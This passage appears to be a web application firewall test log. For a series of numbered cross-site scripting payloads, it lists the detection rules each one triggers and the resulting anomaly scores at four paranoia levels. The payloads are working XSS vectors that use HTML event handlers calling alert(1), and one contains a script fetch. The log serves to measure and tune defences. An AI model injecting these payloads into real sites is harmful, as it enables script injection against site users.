941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
Total Incoming Score: 28
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 50
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 84
****** payload-042 ********
Payload:
payload=<style>:target {transform: rotate(180deg);}</style><a id=x style=&quot;transition:transform 2s&quot; ontransitionrun=alert(1)></a></a>
--- Paranoia Level 1 ---
941190 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
Total Incoming Score: 20
--- Paranoia Level 2 ---
941190 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
Total Incoming Score: 33
--- Paranoia Level 3 ---
941190 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 55
--- Paranoia Level 4 ---
941190 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 89
****** payload-043 ********
Payload:
payload=<body onunhandledrejection=alert(1)><script>fetch(&#039;//xyz&#039;)<\/script></a>
--- Paranoia Level 1 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 30
--- Paranoia Level 2 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 40
--- Paranoia Level 3 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 56
--- Paranoia Level 4 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 85
****** payload-044 ********
Payload:
payload=<video autoplay controls onwaiting=alert(1)><source src=&quot;validvideo.mp4&quot; type=video/mp4></video></a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
Total Incoming Score: 20
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 33
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 64
****** payload-045 ********
Payload:
payload=<input onauxclick=alert(1)></a>
--- Paranoia Level 1 ---
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 10
--- Paranoia Level 2 ---
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 15
--- Paranoia Level 3 ---
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 31
--- Paranoia Level 4 ---
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 44
****** payload-046 ********
Payload:
payload=<a onbeforecopy="alert(1)" contenteditable>test</a></a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 30
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 43
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 56
****** payload-047 ********
Payload:
payload=<a onbeforecut="alert(1)" contenteditable>test</a></a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 30
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 43
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 56
****** payload-048 ********
Payload:
payload=<a onbeforepaste="alert(1)" contenteditable>test</a></a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 30
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 43
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 56
****** payload-049 ********
Payload:
payload=<input onchange=alert(1) value=xss></a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 20
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 33
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 46
****** payload-050 ********
Payload:
payload=<a onclick="alert(1)">test</a></a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 35
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 48
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 61
****** payload-051 ********
Payload:
payload=<a oncontextmenu="alert(1)">test</a></a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 35
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 48
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 61
****** payload-052 ********
Payload:
payload=<a oncopy="alert(1)" contenteditable>test</a></a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 30
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 43
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 56
****** payload-053 ********
Payload:
payload=<a oncut="alert(1)" contenteditable>test</a></a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 30
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 43
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 56
****** payload-054 ********
Payload:
payload=<a ondblclick="alert(1)">test</a></a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 35
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 48
--- Paranoia Level 4 ---
